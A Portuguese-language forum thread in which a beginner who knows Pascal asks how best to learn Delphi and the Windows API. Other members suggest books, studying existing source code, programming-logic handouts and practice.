Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Começando delphi

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Duvida Começando delphi

    Pessoal,

    estou começando o delphi agora. Já estudei o Pascal, e agora decidir passa para o mesmo.
    Eu estou estudando da seguinte maneira:

    Os comando do delphi eu sei praticamente "quase todos", ae quando eu quero fazer algum programa do meu jeito precisa usar muitas API's do Windows, então eu pego alguns exemplos na net ou sources ja prontas e tento enteder, na maioria das vezes consigo inteder, só que n consigo memorizar os comandos.

    Na opnião d vc's, desse geito eu consigo aprender a programar em delphi, ou eu tenho q estudar d outra maneira?

    E se vc's tiverem alguns site, tuto que ensine mas sobre API do windows, por favor, posta ae!

    Bem é isso!
    Desde de já muito obrigado a todos q me ajudar!

  • Font Size
    #2
    Pô, ninguem para da uma dica?
    Apenas um comentario ja serve!

    Comment


    • Font Size
      #3
      isso é um bom começo, tente ler livros sobre o assunto , ver sources de programas mais complexos , e continue fazendo os seus , é sempre bom praticar

      Comment


      • Font Size
        #4
        Cara eu comecei a estudar pela lógica de programação, depois eu fui pela as apostila de Delphi de sintaxe como monta o código, depois fui para apostilas e outro assuntos e comecei a estuda banco de dados.

        Tem varias apostilas na net com bom conteúdos
        É claro que meus filhos terão computadores, mas antes terão livros

        Comment


        • Font Size
          #5
          Vlw pelos comentarios.

          Comment


          • Font Size
            #6
            Desculpe o flood, mas foi um erro aqui, e enviei a mensagem sem querer.

            Voltando ao assunto, Muito obrigado pelos comentarios e vou continuar estudadando.